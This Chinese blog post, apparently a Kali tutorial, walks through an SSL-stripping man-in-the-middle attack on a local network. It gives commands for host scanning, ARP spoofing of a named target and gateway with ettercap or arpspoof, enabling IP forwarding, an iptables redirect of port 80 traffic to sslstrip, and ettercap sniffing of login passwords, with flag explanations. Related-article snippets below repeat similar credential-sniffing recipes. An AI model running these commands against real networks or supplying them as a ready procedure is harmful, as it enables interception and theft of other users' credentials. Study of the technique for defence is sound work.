基于https的内网嗅探-ssl数据嗅探工具sslstrip

已于 2022-09-18 18:01:28 修改
阅读量2.8k 收藏 6
点赞数
分类专栏: kali 文章标签: https ssl 服务器
于 2017-02-16 15:40:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_36001828/article/details/55259469
版权

内网扫描 nmap -sP  192.168.1.1/24​

ettercap -T -q -i wlan0 -M arp:remote /192.168.1.102/192.168.1.1/

ettercap使用方法,参数详解:
-P  使用插件
-T  使用基于文本界面
-q  启动安静模式(不回显)
-M  启动ARP欺骗攻击
192.168.1.102/ 被攻击的目标主机,第二个192.168.1.1网关ip

或者 命令:arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102

开启转发,重新开启一个命令行:

echo "1">/proc/sys/net/ipv4/ip_forward

使用Iptables过滤数据包

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

通过iptables 把所有http数据导入到10000端口,我们用sslstrip监听10000端口,并得到我们想要的数据
参数讲解: 
-t:命令要操作匹配的表(net这个表表示被查询时遇到了新差生的连接包)
Net表有三个内建的链构成 PREROUTING(修改到来的包)、OUTPUT(修改路由之前本地的包)、POSTROUTING(修改准备出去的包)
-A表示在选择的链后加入更多选项
–p指被过滤包的协议

–destination-port 80指被过滤包的目的端口是80 -j REDIRECT –to-port 10000 将80端口的数据跳转到指定端口传输

然后我们使用sslstrip监听10000端口,命令行如下

sslstrip -p -l 10000 -w log.txt

sslstrip -a -f -k

测试登录网址 登录 - 开心网

欺骗成功,然后利用ettercap进行https/http密码嗅探

Kali终端输入:ettercap -Tq -i eth0
-T:启动文本模式  q:安静模式  -i:攻击机网卡

关闭命令 -A 改成 -D

iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

赵一舟
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
arp欺骗,抓取web和ftp用户名和密码-ettercap-运维安全详细笔记
06-30
arp欺骗,抓取web和ftp用户名和密码-ettercap-运维安全详细笔记
利用sslstrip和ettercap突破ssl嗅探密码
gold0523的专栏
11-16 1660
本教程不是原创,是使用黑帽大会上Moxie Marlinspike发布的一款叫sslstrip工具,配合ettercap进行arp欺骗,可以突破经过ssl加密的协议(如https等,一种被动使用https协议的会受到攻击),进行局域网arp嗅探获得口令等信息。本教程不涉及原理,只讲应用,我尽量迅速录完节省大家时间 仍然跟大家说声抱歉,因为个人原因最近比较惆怅,因此不爱说话,所以还是不录语音教
SSLStrip-基于mitmproxy
最新发布
weixin_51031096的博客
07-15 695
拦截下的数据可摁enter进入详细页面,接着摁e进行修改,摁e弹出可修改的参数,选中参数后摁enter可进入修改界面,在第一行修改/添加值即可,之后摁esc再摁q返回之前的详细页面,之后摁a恢复请求,此时表示服务端已收到当前请求并对修改后的请求返回响应。此时摁方向键进入Response界面然后摁e以同样的方式修改数据,修改完成后 摁 ctrl + x 进行保存然后输入y 再摁 enter 进行退出,之后再摁 a 即可将请求发送给客户端。网卡> <靶机IP> <网关地址>
HTTPS网页账号密码嗅探
weixin_45511599的博客
10-13 1787
一:SSL原理 SSL的作用是为了传输一些敏感信息(比如凭证账号密码)提供安全可靠的保障,确保用户使用浏览器和服务器之间传输的数据是安全可信的 当我们访问HTTPS类型的网站,浏览器首先是向服务器发送HTTP层面的请求,并且附带证书验证,在得到双方证书有效后,两者开始SSL安全通信 二:实战 原理:使用SSLstrip攻击,让我们的kali充当中间人(代理服务器),一边负责和靶机win7之间进行http明文通信,kali能够截获明文数据。另一方面kali进行路由转发,和原本win7要连接的服务器进行正常的h
利用SSLStrip & Ettercap ARP欺骗嗅探密码
weixin_34082854的博客
02-21 203
apt-get purge ettercap apt-get purge sslstrip apt-get install ettercap apt-get install sslstrip echo '1' &gt; /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destinat...
SSL剥离工具sslstrip
02-15 722
SSL剥离工具sslstrip 在日常上网过程中,用户只是在地址栏中输入网站域名,而不添加协议类型,如HTTP和HTTPS。这时,浏览器会默认在域名之前添加http://,然后请求网站。如果网站采...
数据嗅探-有错误,易语言源码
08-28
数据嗅探_有错误,易语言源码
基于python实现的福利图嗅探工具
06-28
【作品名称】:基于python实现的福利图嗅探工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 基于python的福利...
网络安全网络嗅探工具.zip
12-29
网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探...
谷歌嗅探扩展 - 猫抓
12-18
【谷歌嗅探扩展 - 猫抓】是针对Chrome浏览器的一款高效工具,它专为链接抓取和管理设计。这款插件的目的是帮助用户轻松地捕获和保存他们在浏览网页时遇到的有价值的链接,尤其适合那些需要频繁收集网络资源的用户。 ...
基于Libpcap实现的局域网嗅探抓包发包解析工具_嗅探抓包发包解析工具_
10-02
基于Libpcap实现的局域;网嗅探抓包发包解析工具.
抓取https协议的用户名与密码
liushaojiax的博客
12-16 392
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport" 分别是什么意思。的工具,可以通过它来设置网络连接的规则。具体来说,redir_command_on命令用于将来自指定端口的数据流量重定向到另一个IP地址和端口,而redir_command_off命令则用于关闭这个端口转发规则。
sslsniff: 动态嗅探并解码HTTPS流量的工具
gitblog_00075的博客
03-14 435
sslsniff: 动态嗅探并解码HTTPS流量的工具 sslsniff是一个用于动态嗅探并解码HTTPS流量的工具。它可以帮助安全研究人员、开发者和网络管理员检测潜在的安全漏洞,并进行调试。 项目概述 sslsniff是Moxie Marlinspike开发的一个开源项目,它可以捕获HTTPS连接并通过中间人攻击解密流量。此工具可以用于测试网站的加密安全性,并帮助识别可能的SSL/TLS漏洞。 ...
【kail】使用Ettercap抓取用户名和密码
爪白白的个人博客
12-14 5816
【kail】使用Ettercap获取局域网内所有主机 ip 获取局域网内所有主机登录登录网站时,用户名和密码(http)
嗅探工具 --- wireshark、tcpdump、dsniff、ettercap、bettercap、netsniff-ng、cain
热门推荐
freeking101的博客
06-11 3万+
嗅探 --- wireshark、tcpdump、dsniff、Ettercap、netsniff-ng
网络安全——渗透综合实验
HizT_1999的博客
06-24 2307
综合实验: 任务一: 1.使用wireshark分析数据包 通过对test1.cap的分析,可以看出192.168.1.3与192.168.1.4之间存在ftp服务。 2.使用ettercap进行嗅探,获取ftp登录信息 得到ftp服务登录账号:simple 密码:simple123 登录ftp服务器获取key.txt内容。同时还发现192.168.1.4存在WebLogic漏洞,使用 工具进行攻击。 3.weblogic攻击 查看key1.txt内容,提交答案如下: 任务二: 1.分析test
利用sslstrip和ettercap
hellotjc的专栏
03-22 2296
需要工具:      1. sslstrip         下载及安装方法 :    wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz                                          tar zxvf sslstrip-0.9.tar.gz
https传输过程嗅探
weixin_34195546的博客
12-06 1375
C1->浏览器告知服务器自身的信息 length = 165 a5 16 03 01 00 A0 01 00 00 9C 03 03 5E 1C 37 CD 40 [ ^ 7 @] B6 4A 9A 1A BC 43 85 2D 91 6E 24 D1 CB 98 D2 67 [ J C - n$ g] 30 7B B9 34 F6 34 14 5...
记录一次ARP欺骗+内网嗅探(wirshark抓取https
akucoco的博客
08-04 897
使用kali对内网进行ARP欺骗,嗅探监听目标主机(wirshark抓取https数据包)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值